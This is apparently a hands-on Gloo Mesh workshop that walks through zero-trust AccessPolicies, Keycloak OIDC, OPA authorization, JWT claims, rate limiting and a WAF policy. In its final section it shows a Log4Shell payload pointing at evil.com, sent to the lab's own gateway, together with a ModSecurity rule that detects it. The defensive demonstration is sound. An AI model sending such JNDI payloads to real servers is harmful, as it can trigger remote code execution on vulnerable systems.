pod=$(kubectl --context ${CLUSTER1} -n httpbin get pods -l app=in-mesh -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${CLUSTER1} -n httpbin debug -i -q ${pod} --image=curlimages/curl -- curl -s -o /dev/null -w "%{http_code}" http://reviews.bookinfo-backends.svc.cluster.local:9080/reviews/0
You should get a `403` response code, which means that the sidecar proxy of the `reviews` service doesn't allow the request.
You've seen how Gloo Platform can help you enforce a zero trust policy (at the workspace level) with nearly no effort.
Now we are going to define some additional policies to achieve zero trust at the service level.

We are going to define AccessPolicies from the point of view of the service producers: as the owner of service A, which services need to communicate with me?
The productpage app is the only service exposed to the internet, so we will create an `AccessPolicy` to allow the Istio Ingress Gateway to forward requests to the productpage service.
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: AccessPolicy
metadata:
name: frontend-api-access
namespace: bookinfo-frontends
spec:
applyToDestinations:
- selector:
labels:
app: productpage
config:
authz:
allowedClients:
- serviceAccountSelector:
name: istio-ingressgateway-1-17-service-account
namespace: istio-gateways
- serviceAccountSelector:
name: istio-eastwestgateway-1-17-service-account
namespace: istio-gateways
- serviceAccountSelector:
name: ext-auth-service
namespace: gloo-mesh-addons
- serviceAccountSelector:
name: rate-limiter
namespace: gloo-mesh-addons
EOF
Details and reviews are both used by the productpage service, so we will create an AccessPolicy to allow the productpage service to forward requests to the details and reviews services.
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: AccessPolicy
metadata:
name: allow-details-reviews
namespace: bookinfo-frontends
spec:
applyToDestinations:
- selector:
labels:
app: details
- selector:
labels:
app: reviews
config:
authz:
allowedClients:
- serviceAccountSelector:
name: bookinfo-productpage
EOF
Finally, we will create an AccessPolicy to allow the reviews service to forward requests to the ratings service.
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: AccessPolicy
metadata:
name: allow-ratings
namespace: bookinfo-frontends
spec:
applyToDestinations:
- selector:
labels:
app: ratings
config:
authz:
allowedClients:
- serviceAccountSelector:
name: bookinfo-reviews
EOF
Let's check that requests from `productpage` are denied/allowed properly:
pod=$(kubectl --context ${CLUSTER1} -n bookinfo-frontends get pods -l app=productpage -o jsonpath='{.items[0].metadata.name}')
echo "From productpage to details, should be allowed"
kubectl --context ${CLUSTER1} -n bookinfo-frontends debug -i -q ${pod} --image=curlimages/curl -- curl -s http://details.bookinfo-backends:9080/details/0 | jq
echo "From productpage to reviews, should be allowed"
kubectl --context ${CLUSTER1} -n bookinfo-frontends debug -i -q ${pod} --image=curlimages/curl -- curl -s http://reviews.bookinfo-backends:9080/reviews/0 | jq
echo "From productpage to ratings, should be denied"
kubectl --context ${CLUSTER1} -n bookinfo-frontends debug -i -q ${pod} --image=curlimages/curl -- curl -s http://ratings.bookinfo-backends:9080/ratings/0 -i
You should get a `403` response code for the last request, which means that the sidecar proxy of the `ratings` service doesn't allow the request.
HTTP/1.1 403 Forbidden
content-length: 19
content-type: text/plain
server: envoy
x-envoy-upstream-service-time: 18
RBAC: access denied
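To understand why this last request is denied, you can inspect the `AuthorizationPolicy` objects Gloo Mesh generated from the AccessPolicies and look at the allowed principals (a quick grep-based sketch; the object names and exact layout are managed by Gloo Mesh):

```bash
kubectl --context ${CLUSTER1} -n bookinfo-backends get authorizationpolicies -o yaml | grep -B 2 -A 5 principals
```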
Let's rollback the change we've made in the `WorkspaceSettings` object:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: bookinfo
namespace: bookinfo-frontends
spec:
importFrom:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
exportTo:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
labels:
app: productpage
- kind: SERVICE
labels:
app: reviews
- kind: ALL
labels:
expose: "true"
EOF
and delete the `AccessPolicies`:
kubectl --context ${CLUSTER1} delete accesspolicies -n bookinfo-frontends --all
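If you want to double-check the rollback (this verification isn't part of the original lab), you can rerun the last request; with service isolation disabled and the AccessPolicies deleted, it should succeed again:

```bash
pod=$(kubectl --context ${CLUSTER1} -n bookinfo-frontends get pods -l app=productpage -o jsonpath='{.items[0].metadata.name}')
kubectl --context ${CLUSTER1} -n bookinfo-frontends debug -i -q ${pod} --image=curlimages/curl -- curl -s -o /dev/null -w "%{http_code}" http://ratings.bookinfo-backends:9080/ratings/0
```

You should get a `200` response code again.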
We're going to create a workspace for the team in charge of the httpbin application.
The platform team needs to create the corresponding `Workspace` Kubernetes objects in the Gloo Mesh management cluster.
Let's create the `httpbin` workspace, which corresponds to the `httpbin` namespace on `cluster1`:
kubectl apply --context ${MGMT} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: Workspace
metadata:
name: httpbin
namespace: gloo-mesh
labels:
allow_ingress: "true"
spec:
workloadClusters:
- name: cluster1
namespaces:
- name: httpbin
EOF
Then, the Httpbin team creates a `WorkspaceSettings` Kubernetes object in one of the namespaces of the `httpbin` workspace:
kubectl apply --context ${CLUSTER1} -f- <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: WorkspaceSettings
metadata:
name: httpbin
namespace: httpbin
spec:
importFrom:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
exportTo:
- workspaces:
- name: gateways
resources:
- kind: SERVICE
labels:
app: in-mesh
- kind: ALL
labels:
expose: "true"
EOF
The Httpbin team has decided to export the following to the `gateways` workspace (using a reference):

- the `in-mesh` Kubernetes service
- all the resources (RouteTables, VirtualDestination, ...) that have the label `expose` set to `true`
In this step, we're going to expose an external service through a Gateway using Gloo Mesh and show how we can then migrate this service to the Mesh.
Let's create an `ExternalService` corresponding to `httpbin.org`:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: ExternalService
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
hosts:
- httpbin.org
ports:
- name: http
number: 80
protocol: HTTP
- name: https
number: 443
protocol: HTTPS
clientsideTls: {}
EOF
Now, you can create a `RouteTable` to expose `httpbin.org` through the gateway:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
matchers:
- uri:
exact: /get
forwardTo:
destinations:
- kind: EXTERNAL_SERVICE
port:
number: 443
ref:
name: httpbin
namespace: httpbin
EOF
You should now be able to access the `httpbin.org` external service through the gateway.

Get the URL to access the `httpbin` service using the following command:
echo "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/get"
Let's update the `RouteTable` to direct 50% of the traffic to the local `httpbin` service:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
matchers:
- uri:
exact: /get
forwardTo:
destinations:
- kind: EXTERNAL_SERVICE
port:
number: 443
ref:
name: httpbin
namespace: httpbin
weight: 50
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
weight: 50
EOF
If you refresh your browser, you should see that you get a response either from the local service or from the external service.
When the response comes from the external service (httpbin.org), there's an `X-Amzn-Trace-Id` header. And when the response comes from the local service, there's an `X-B3-Parentspanid` header.
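To observe the 50/50 split without a browser, you can loop over a few requests and check which header is echoed back (a small sketch; header names may vary slightly between httpbin implementations):

```bash
for i in $(seq 1 10); do
  curl -sk "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/get" \
    | jq -r '.headers | if has("X-Amzn-Trace-Id") then "external (httpbin.org)" else "local (in-mesh)" end'
done
```

You should see a roughly even mix of both answers.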
Finally, you can update the `RouteTable` to direct all the traffic to the local `httpbin` service:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
matchers:
- uri:
exact: /get
forwardTo:
destinations:
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
EOF
If you refresh your browser, you should see that you get responses only from the local service.
This diagram shows the flow of the requests:
In many use cases, you need to restrict the access to your applications to authenticated users.
OIDC (OpenID Connect) is an identity layer on top of the OAuth 2.0 protocol. In OAuth 2.0 flows, authentication is performed by an external Identity Provider (IdP) which, in case of success, returns an Access Token representing the user identity. The protocol does not define the contents and structure of the Access Token, which greatly reduces the portability of OAuth 2.0 implementations.
The goal of OIDC is to address this ambiguity by additionally requiring Identity Providers to return a well-defined ID Token. OIDC ID tokens follow the JSON Web Token standard and contain specific fields that your applications can expect and handle. This standardization allows you to switch between Identity Providers – or support multiple ones at the same time – with minimal, if any, changes to your downstream services; it also allows you to consistently apply additional security measures like Role-based Access Control (RBAC) based on the identity of your users, i.e. the contents of their ID token.
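As a reminder of what such a token looks like, here is a minimal sketch that decodes the payload (the middle, base64url-encoded part) of any JWT stored in a `TOKEN` variable, for example the Keycloak access token you'll retrieve later in this lab:

```bash
# Take the second dot-separated segment and convert base64url to base64
payload=$(echo "${TOKEN}" | cut -d. -f2 | tr '_-' '/+')
# base64url omits padding, so restore it before decoding
while [ $(( ${#payload} % 4 )) -ne 0 ]; do payload="${payload}="; done
echo "${payload}" | base64 -d | jq .
```

The claims are plain JSON; only the signature (the third segment) protects their integrity, which is why tokens must always be validated.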
In this lab, we're going to install Keycloak. It will allow us to setup OIDC workflows later.
Let's install it:
kubectl --context ${MGMT} create namespace keycloak
cat data/steps/deploy-keycloak/keycloak.yaml | sed "s/image: quay.io/image: ${registry}/g" | kubectl --context ${MGMT} -n keycloak apply -f -
kubectl --context ${MGMT} -n keycloak rollout status deploy/keycloak
Then, we will configure it and create two users:
- User1 credentials: `user1/password`, email: `[email protected]`
- User2 credentials: `user2/password`, email: `[email protected]`
Let's set the environment variables we need:
export ENDPOINT_KEYCLOAK=$(kubectl --context ${MGMT} -n keycloak get service keycloak -o jsonpath='{.status.loadBalancer.ingress[0].*}'):8080
export HOST_KEYCLOAK=$(echo ${ENDPOINT_KEYCLOAK} | cut -d: -f1)
export PORT_KEYCLOAK=$(echo ${ENDPOINT_KEYCLOAK} | cut -d: -f2)
export KEYCLOAK_URL=http://${ENDPOINT_KEYCLOAK}
Now, we need to get a token:
export KEYCLOAK_TOKEN=$(curl -d "client_id=admin-cli" -d "username=admin" -d "password=admin" -d "grant_type=password" "$KEYCLOAK_URL/realms/master/protocol/openid-connect/token" | jq -r .access_token)
After that, we configure Keycloak:
# Create initial token to register the client
read -r client token <<<$(curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X POST -H "Content-Type: application/json" -d '{"expiration": 0, "count": 1}' $KEYCLOAK_URL/admin/realms/master/clients-initial-access | jq -r '[.id, .token] | @tsv')
export KEYCLOAK_CLIENT=${client}
# Register the client
read -r id secret <<<$(curl -X POST -d "{ \"clientId\": \"${KEYCLOAK_CLIENT}\" }" -H "Content-Type:application/json" -H "Authorization: bearer ${token}" ${KEYCLOAK_URL}/realms/master/clients-registrations/default| jq -r '[.id, .secret] | @tsv')
export KEYCLOAK_SECRET=${secret}
# Add allowed redirect URIs
curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X PUT -H "Content-Type: application/json" -d '{"serviceAccountsEnabled": true, "directAccessGrantsEnabled": true, "authorizationServicesEnabled": true, "redirectUris": ["'https://${ENDPOINT_HTTPS_GW_CLUSTER1}'/callback","'https://${ENDPOINT_HTTPS_GW_CLUSTER1}'/get"]}' $KEYCLOAK_URL/admin/realms/master/clients/${id}
# Add the group attribute in the JWT token returned by Keycloak
curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X POST -H "Content-Type: application/json" -d '{"name": "group", "protocol": "openid-connect", "protocolMapper": "oidc-usermodel-attribute-mapper", "config": {"claim.name": "group", "jsonType.label": "String", "user.attribute": "group", "id.token.claim": "true", "access.token.claim": "true"}}' $KEYCLOAK_URL/admin/realms/master/clients/${id}/protocol-mappers/models
# Create first user
curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X POST -H "Content-Type: application/json" -d '{"username": "user1", "email": "[email protected]", "enabled": true, "attributes": {"group": "users"}, "credentials": [{"type": "password", "value": "password", "temporary": false}]}' $KEYCLOAK_URL/admin/realms/master/users
# Create second user
curl -H "Authorization: Bearer ${KEYCLOAK_TOKEN}" -X POST -H "Content-Type: application/json" -d '{"username": "user2", "email": "[email protected]", "enabled": true, "attributes": {"group": "users"}, "credentials": [{"type": "password", "value": "password", "temporary": false}]}' $KEYCLOAK_URL/admin/realms/master/users
Note: If you get a Not Authorized error, re-run the following command to refresh the token and then continue from the command that started to fail:
KEYCLOAK_TOKEN=$(curl -d "client_id=admin-cli" -d "username=admin" -d "password=admin" -d "grant_type=password" "$KEYCLOAK_URL/realms/master/protocol/openid-connect/token" | jq -r .access_token)
In this step, we're going to secure the access to the `httpbin` service using OAuth.
First, we need to create a Kubernetes Secret that contains the OIDC secret:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: v1
kind: Secret
metadata:
name: oauth
namespace: httpbin
type: extauth.solo.io/oauth
data:
client-secret: $(echo -n ${KEYCLOAK_SECRET} | base64)
EOF
Then, you need to create an `ExtAuthPolicy`, which is a CRD that contains authentication information:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: ExtAuthPolicy
metadata:
name: httpbin
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
oauth: "true"
config:
server:
name: ext-auth-server
namespace: httpbin
cluster: cluster1
glooAuth:
configs:
- oauth2:
oidcAuthorizationCode:
appUrl: "https://${ENDPOINT_HTTPS_GW_CLUSTER1}"
callbackPath: /callback
clientId: ${KEYCLOAK_CLIENT}
clientSecretRef:
name: oauth
namespace: httpbin
issuerUrl: "${KEYCLOAK_URL}/realms/master/"
session:
failOnFetchFailure: true
redis:
cookieName: keycloak-session
options:
host: redis:6379
scopes:
- email
headers:
idTokenHeader: jwt
EOF
After that, you need to create an `ExtAuthServer`, which is a CRD that defines which extauth server to use:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: ExtAuthServer
metadata:
name: ext-auth-server
namespace: httpbin
spec:
destinationServer:
ref:
cluster: cluster1
name: ext-auth-service
namespace: gloo-mesh-addons
port:
name: grpc
EOF
Finally, you need to update the `RouteTable` to use this `ExtAuthPolicy`:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
labels:
oauth: "true"
matchers:
- uri:
exact: /get
- uri:
exact: /logout
- uri:
prefix: /callback
forwardTo:
destinations:
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
EOF
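Before using the browser, you can also observe the OAuth flow from the terminal: an unauthenticated request to the protected route should now be redirected to Keycloak (a quick check, not part of the original lab):

```bash
curl -k "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/get" -i
```

You should see a redirect response (typically a `302`) with a `location` header pointing to the Keycloak authorization endpoint.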
If you refresh the web browser, you will be redirected to the authentication page.

If you use the username `user1` and the password `password`, you should be redirected back to the `httpbin` application.
You can also perform authorization using OPA.
First, you need to create a `ConfigMap` with the policy written in Rego:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: v1
kind: ConfigMap
metadata:
name: allow-solo-email-users
namespace: httpbin
data:
policy.rego: |-
package test
default allow = false
allow {
[header, payload, signature] = io.jwt.decode(input.state.jwt)
endswith(payload["email"], "@solo.io")
}
EOF
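If you have the `opa` CLI installed, you can sanity-check this policy locally before relying on it. The sketch below builds a fake, unsigned JWT whose payload contains a made-up `@solo.io` email (`io.jwt.decode` only decodes, it doesn't verify the signature) and evaluates the policy against it:

```bash
# Fetch the policy we just created
kubectl --context ${CLUSTER1} -n httpbin get configmap allow-solo-email-users -o jsonpath='{.data.policy\.rego}' > policy.rego

# Build a fake JWT (header.payload.signature) with a hypothetical @solo.io email
header=$(echo -n '{"alg":"HS256","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-')
payload=$(echo -n '{"email":"[email protected]"}' | base64 | tr -d '=' | tr '/+' '_-')
echo "{\"state\": {\"jwt\": \"${header}.${payload}.c2ln\"}}" > input.json

# Evaluate the policy; the result should be true
opa eval -d policy.rego -i input.json "data.test.allow"
```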
Then, you need to update the `ExtAuthPolicy` object to add the authorization step:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: ExtAuthPolicy
metadata:
name: httpbin
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
oauth: "true"
config:
server:
name: ext-auth-server
namespace: httpbin
cluster: cluster1
glooAuth:
configs:
- oauth2:
oidcAuthorizationCode:
appUrl: "https://${ENDPOINT_HTTPS_GW_CLUSTER1}"
callbackPath: /callback
clientId: ${KEYCLOAK_CLIENT}
clientSecretRef:
name: oauth
namespace: httpbin
issuerUrl: "${KEYCLOAK_URL}/realms/master/"
logoutPath: /logout
afterLogoutUrl: "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/get"
session:
failOnFetchFailure: true
redis:
cookieName: keycloak-session
options:
host: redis:6379
scopes:
- email
headers:
idTokenHeader: jwt
- opaAuth:
modules:
- name: allow-solo-email-users
namespace: httpbin
query: "data.test.allow == true"
EOF
Refresh the web page. `user1` shouldn't be allowed to access it anymore since the user's email ends with `@example.com`.

If you open the browser in incognito and log in using the username `user2` and the password `password`, you will now be able to access it since the user's email ends with `@solo.io`.
This diagram shows the flow of the request (with the Istio ingress gateway leveraging the `extauth` Pod to authorize the request):
In this step, we're going to validate the JWT token and create a new header from the `email` claim.
Keycloak is running outside of the Service Mesh, so we need to define an `ExternalService` and its associated `ExternalEndpoint`.

Let's start with the latter:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: ExternalEndpoint
metadata:
name: keycloak
namespace: httpbin
labels:
host: keycloak
spec:
address: ${HOST_KEYCLOAK}
ports:
- name: http
number: ${PORT_KEYCLOAK}
EOF
Then we can create the former:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: ExternalService
metadata:
name: keycloak
namespace: httpbin
labels:
expose: "true"
spec:
hosts:
- keycloak
ports:
- name: http
number: ${PORT_KEYCLOAK}
protocol: HTTP
selector:
host: keycloak
EOF
Now, we can create a `JWTPolicy` to extract the claim.
Create the policy:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: security.policy.gloo.solo.io/v2
kind: JWTPolicy
metadata:
name: httpbin
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
oauth: "true"
config:
phase:
postAuthz:
priority: 1
providers:
keycloak:
issuer: ${KEYCLOAK_URL}/realms/master
tokenSource:
headers:
- name: jwt
remote:
url: ${KEYCLOAK_URL}/realms/master/protocol/openid-connect/certs
destinationRef:
kind: EXTERNAL_SERVICE
ref:
name: keycloak
port:
number: ${PORT_KEYCLOAK}
claimsToHeaders:
- claim: email
header: X-Email
EOF
You can see that it will be applied to our existing route and also that we want to execute it after performing the external authentication (to have access to the JWT token).
If you refresh the web page, you should see a new `X-Email` header added to the request with the email address of the logged-in user (ending with `@solo.io` if you're still logged in as `user2`).
In this step, we're going to use a regular expression to extract a part of an existing header and to create a new one:
Let's create a `TransformationPolicy` to extract the organization from the `X-Email` header:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: TransformationPolicy
metadata:
name: modify-header
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
oauth: "true"
config:
phase:
postAuthz:
priority: 2
request:
injaTemplate:
extractors:
organization:
header: 'X-Email'
regex: '.*@(.*)$'
subgroup: 1
headers:
x-organization:
text: "{{ organization }}"
EOF
You can see that it will be applied to our existing route, and also that we want to execute it after the JWT policy of the previous step (priority 2 in the postAuthz phase), so that the `X-Email` header created from the claim is available to the transformation.
If you refresh the web page, you should see a new `X-Organization` header added to the request with the value `solo.io`.
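If you want to check what the regular expression captures, you can reproduce the extraction locally with a hypothetical email value (illustration only; at runtime the gateway does this with the Inja extractor defined above):

```bash
echo "[email protected]" | sed -E 's/.*@(.*)$/\1/'
# prints: solo.io
```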
In this step, we're going to apply rate limiting to the Gateway to only allow 3 requests per minute for the users of the `solo.io` organization.
First, we need to create a `RateLimitClientConfig` object to define the descriptors:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: RateLimitClientConfig
metadata:
name: httpbin
namespace: httpbin
spec:
raw:
rateLimits:
- setActions:
- requestHeaders:
descriptorKey: organization
headerName: X-Organization
EOF
Then, we need to create a `RateLimitServerConfig` object to define the limits based on the descriptors:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: RateLimitServerConfig
metadata:
name: httpbin
namespace: httpbin
spec:
destinationServers:
- ref:
cluster: cluster1
name: rate-limiter
namespace: gloo-mesh-addons
port:
name: grpc
raw:
setDescriptors:
- simpleDescriptors:
- key: organization
value: solo.io
rateLimit:
requestsPerUnit: 3
unit: MINUTE
EOF
After that, we need to create a `RateLimitPolicy` object to bind these configurations to the route:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: RateLimitPolicy
metadata:
name: httpbin
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
ratelimited: "true"
config:
serverSettings:
name: rate-limit-server
namespace: httpbin
cluster: cluster1
ratelimitClientConfig:
name: httpbin
namespace: httpbin
cluster: cluster1
ratelimitServerConfig:
name: httpbin
namespace: httpbin
cluster: cluster1
phase:
postAuthz:
priority: 3
EOF
We also need to create a `RateLimitServerSettings`, which is a CRD that defines which rate limit server to use:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: admin.gloo.solo.io/v2
kind: RateLimitServerSettings
metadata:
name: rate-limit-server
namespace: httpbin
spec:
destinationServer:
ref:
cluster: cluster1
name: rate-limiter
namespace: gloo-mesh-addons
port:
name: grpc
EOF
Finally, you need to update the `RouteTable` to use this `RateLimitPolicy`:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
labels:
oauth: "true"
ratelimited: "true"
matchers:
- uri:
exact: /get
- uri:
prefix: /callback
forwardTo:
destinations:
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
EOF
Refresh the web page multiple times. You should get a `200` response code for the first 3 requests and a `429` response code afterwards.
This diagram shows the flow of the request (with the Istio ingress gateway leveraging the `rate limiter` Pod to determine if the request should be allowed):
Let's apply the original `RouteTable` yaml:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: httpbin
namespace: httpbin
labels:
expose: "true"
spec:
http:
- name: httpbin
matchers:
- uri:
exact: /get
forwardTo:
destinations:
- ref:
name: in-mesh
namespace: httpbin
port:
number: 8000
EOF
And also delete the different objects we've created:
kubectl --context ${CLUSTER1} -n httpbin delete ratelimitpolicy httpbin
kubectl --context ${CLUSTER1} -n httpbin delete ratelimitclientconfig httpbin
kubectl --context ${CLUSTER1} -n httpbin delete ratelimitserverconfig httpbin
kubectl --context ${CLUSTER1} -n httpbin delete ratelimitserversettings rate-limit-server
A web application firewall (WAF) protects web applications by monitoring, filtering, and blocking potentially harmful traffic and attacks that can overtake or exploit them.
Gloo Mesh includes the ability to enable the ModSecurity Web Application Firewall for any incoming and outgoing HTTP connections.
As an example of how Gloo Mesh helps, we'll show how to easily mitigate the Log4Shell vulnerability (CVE-2021-44228), which for many enterprises was a major ordeal that took weeks and months of updating all services.
The Log4Shell vulnerability impacted all Java applications that used the log4j library (common library used for logging) and that exposed an endpoint. You could exploit the vulnerability by simply making a request with a specific header. In the example below, we will show how to protect your services against the Log4Shell exploit.
Using the Web Application Firewall capabilities you can reject requests containing such headers.
Log4Shell attacks operate by passing in a Log4j expression that could trigger a lookup to a remote server, like a JNDI identity service. The malicious expression might look something like this: `${jndi:ldap://evil.com/x}`. It might be passed in to the service via a header, a request argument, or a request payload. What the attacker is counting on is that the vulnerable system will log that string using log4j without checking it. That's what triggers the destructive JNDI lookup and the ultimate execution of malicious code.
Create the WAF policy:
kubectl --context ${CLUSTER1} apply -f - <<'EOF'
apiVersion: security.policy.gloo.solo.io/v2
kind: WAFPolicy
metadata:
name: log4shell
namespace: httpbin
spec:
applyToRoutes:
- route:
labels:
waf: "true"
config:
disableCoreRuleSet: true
customInterventionMessage: 'Log4Shell malicious payload'
customRuleSets:
- ruleStr: |
SecRuleEngine On
SecRequestBodyAccess On
SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@*
"@rx \${jndi:(?:ldaps?|iiop|dns|rmi)://"
"id:1000,phase:2,deny,status:403,log,msg:'Potential Remote Command Execution: Log4j CVE-2021-44228'"
EOF
In this example, we're going to update the main `RouteTable` to enforce this policy for all the applications exposed through the gateway (in any workspace).
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: main
namespace: istio-gateways
spec:
hosts:
- '*'
virtualGateways:
- name: north-south-gw
namespace: istio-gateways
cluster: cluster1
workloadSelectors: []
http:
- name: root
labels:
waf: "true"
matchers:
- uri:
prefix: /
delegate:
routeTables:
- labels:
expose: "true"
EOF
Run the following command to simulate an attack:
curl -H "User-Agent: \${jndi:ldap://evil.com/x}" -k "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/get" -i
The request should be rejected:
HTTP/2 403
content-length: 27
content-type: text/plain
date: Tue, 05 Apr 2022 10:20:06 GMT
server: istio-envoy
Log4Shell malicious payload
Let's apply the original `RouteTable` yaml:
kubectl --context ${CLUSTER1} apply -f - <<EOF
apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
name: main
namespace: istio-gateways
spec:
hosts:
- '*'
virtualGateways:
- name: north-south-gw
namespace: istio-gateways
cluster: cluster1
workloadSelectors: []
http:
- name: root
matchers:
- uri:
prefix: /
delegate:
routeTables:
- labels:
expose: "true"
EOF
And also delete the WAF policy we've created:
kubectl --context ${CLUSTER1} -n httpbin delete wafpolicies.security.policy.gloo.solo.io log4shell
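To double-check the rollback (not part of the original lab), you can send a legitimate request through the gateway; it should reach the in-mesh `httpbin` service again without being intercepted by the WAF:

```bash
curl -k "https://${ENDPOINT_HTTPS_GW_CLUSTER1}/get" -i
```

You should get a `200` response code.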